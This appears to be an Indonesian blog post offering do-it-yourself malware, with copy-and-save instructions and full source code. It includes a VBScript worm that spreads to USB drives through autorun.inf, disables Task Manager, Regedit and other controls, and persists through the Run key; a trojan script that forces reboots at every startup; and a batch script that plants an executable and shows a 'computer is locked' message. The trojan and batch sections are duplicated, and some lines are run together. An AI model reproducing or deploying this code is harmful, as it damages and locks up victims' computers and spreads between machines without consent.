Virus vbs
Cara membuat virus vbs :
1. Copy kode dibawah ini
2. Lalu pastekan kode tersebut di notepad
3. Save file all dengan berekstensi .vbs
‘//-Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus-//
on error resume next
‘//-Dim kata-kata berikut ini-//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,YouDieCbrXplr,nt,check,sd
‘//-Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information-//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe YouDieXplr.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//-Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- YouDieXplr.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- YouDieXplr.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- YouDieXplr.dll.vbs “)
tf.attributes = 39
‘//-Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok-//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//-Cek Drive-//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
‘//-Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\-//
set tf=fs.getfile(flashdrive.path &”\YouDieXplr.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\YouDieXplr.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\YouDieXplr.dll.vbs “)
tf.attributes = 39
‘//-Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)-//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//-Manipulasi Registry-//
set YouDieCbrXplr = createobject(“WScript.Shell”)
‘//-Manip – Ubah Title Internet Explorer menjadi THE YOUDIECBRXPLR v.s. ZAY-//
YouDieCbrXplr.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE YOUDIECBRXPLR v.s. ZAY “
‘//-Manip – Set agar file hidden tidak ditampilkan di Explorer-//
YouDieCbrXplr.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,
“0″, “REG_DWORD”
‘//-Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager-//
YouDieCbrXplr.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
YouDieCbrXplr.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”,
“1″, “REG_DWORD”
YouDieCbrXplr.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
YouDieCbrXplr.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”,
“1″, “REG_DWORD”
YouDieCbrXplr.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”,
“1″, “REG_DWORD”
‘//-Manip – Disable klik kanan-//
YouDieCbrXplr.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”,
“1″, “REG_DWORD”
‘//-Manip – Munculkan Pesan Setiap Windows Startup-//
YouDieCbrXplr.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”,
“Worm YouDieCbrXplr. Variant from Rangga-Zay, don’t panic all data are
safe.”
‘//-Manip – Aktif setiap Windows Startup-//
YouDieCbrXplr.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
windowpath & “\batch- YouDieXplr.dll.vbs “
//-Manip – Ubah RegisteredOwner dan Organization-//
YouDieCbrXplr.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
YouDieCbrXplr.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”YouDieCbrXplr”
‘//-Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan-//
if check 1 then
Wscript.sleep 200000
end if
loop while check 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode
Cara membuat :
1. Copy semua kode diatas
2. Lalu pastekan kode tersebut di notepad
3. dan save dengan berekstensi .vbs
1. Copy semua kode diatas
2. Lalu pastekan kode tersebut di notepad
3. dan save dengan berekstensi .vbs
rem – dlRB “DL Reboot” Trojan script by D.L. On Error Resume Next
dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData
set FSobj=CreateObject(“Scripting.FileSystemObject”)
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs”
sub createRegKey(regKey,regVal)
set regEdit = CreateObject(“WScript.Shell”)
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”)
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),”"”")
set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _
“strComputer = ^.^ ” &vbcrlf& _
“Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _
“& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _
“Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _
“(^Select * from Win32_OperatingSystem^)” &vbcrlf& _
“For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _
“ObjOperatingSystem.Reboot()” &vbcrlf& _
“Next”
end function
function rebootSystem()
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate,(Shutdown)}!\\” & strComputer & “\root\cimv2″)
Set colOperatingSystems = objWMIService.ExecQuery _
(“Select * from Win32_OperatingSystem”)
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function
Virus Autorun
Cara membuat :
lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)- buat Autorun.inf dengan script:[autorun]open=nama_file.bat- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY- copy file-file tsb ke CD- nikmati efeknya
dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData
set FSobj=CreateObject(“Scripting.FileSystemObject”)
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs”
sub createRegKey(regKey,regVal)
set regEdit = CreateObject(“WScript.Shell”)
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”)
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),”"”")
set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _
“strComputer = ^.^ ” &vbcrlf& _
“Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _
“& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _
“Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _
“(^Select * from Win32_OperatingSystem^)” &vbcrlf& _
“For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _
“ObjOperatingSystem.Reboot()” &vbcrlf& _
“Next”
end function
function rebootSystem()
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate,(Shutdown)}!\\” & strComputer & “\root\cimv2″)
Set colOperatingSystems = objWMIService.ExecQuery _
(“Select * from Win32_OperatingSystem”)
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function
Virus Autorun
Cara membuat :
lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)- buat Autorun.inf dengan script:[autorun]open=nama_file.bat- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY- copy file-file tsb ke CD- nikmati efeknya
@echo
offcopy image_name(terserah dari nama file gambar pembuat).bmp
%systemdrive%\ /ycopy image_name(terserah dari nama file gambar
pembuat).bmp %systemdrive%\WINDOWS\ /ycopy image_name(terserah dari nama
file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /ycopy
nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke
.exe,atau file exstensi lain,tampilan file terserah pembuat).exe
%systemdrive%\ /ycopy nama_file(maksudnya file yang dibuat dengan flash
lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah
pembuat).exe %systemdrive%\WINDOWS\ /ycopy nama_file(maksudnya file yang
dibuat dengan flash lalu di publish ke .exe,atau file exstensi
lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\
/yreg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE
FROM LOCAL_HOST(judul title bar)” /freg add
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR
COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /freg add
“HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar
pembuat).bmp /freg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v
WallpaperStyle /d 0 /freg add “HKEY_USERS\.DEFAULT\Control
Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar
pembuat).bmp /freg add
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v
nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file
yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi
lain,tampilan file terserah pembuat).exe /freg add
“HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau
kombinasi warna RGB lain,cari pake Adobe Photoshop) /f-
lalu
di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)- buat
Autorun.inf dengan script:[autorun]open=nama_file.bat- lalu SAVE AS ALL
FILES dengan exstensi .inf (Autorun.inf)- file-file tersebut harus dalam
1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri
tanda check pada HIDDEN dan READ-ONLY- copy file-file tsb ke CD- nikmati
efeknya
